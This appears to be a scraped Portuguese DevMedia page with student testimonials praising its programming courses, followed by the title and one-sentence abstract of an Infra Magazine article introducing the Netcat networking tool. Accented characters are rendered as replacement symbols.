Adquiri o curso de voc�s e logo percebi que s�o os melhores do Brasil. � um passo a passo incr�vel. S� n�o aprende quem n�o quer. Foi o melhor investimento da minha vida!

Felipe Nunes

Foi um dos melhores investimentos que j� fiz na vida e tenho aprendido bastante com a plataforma. Voc�s est�o fazendo parte da minha jornada nesse mundo da programa��o, irei assinar meu contrato como programador gra�as a plataforma.

Wanderson Oliveira

Comprei a assinatura tem uma semana, aprendi mais do que 4 meses estudando outros cursos. Exerc�cios pr�ticos que n�o tem como n�o aprender, est�o de parab�ns!

Jos� Lucas

Obrigado DevMedia, nunca presenciei uma plataforma de ensino t�o presente na vida acad�mica de seus alunos, parab�ns!

Eduardo Dorneles

Aprendi React na plataforma da DevMedia h� cerca de 1 ano e meio... Hoje estou h� 1 ano empregado trabalhando 100% com React!

Adauto Junior

J� fiz alguns cursos na �rea e nenhum � t�o bom quanto o de voc�s. Estou aprendendo muito, muito obrigado por existirem. Est�o de parab�ns... Espero um dia conseguir um emprego na �rea.

Ver todos os casos de sucesso

Netcat: O canivete su��o TCP/IP - Revista Infra Magazine 8

Este artigo tem por objetivo descrever as principais caracter�sticas do comando Netcat, fornecendo aos leitores os fundamentos te�ricos e pr�ticos desse software t�o �til atualmente.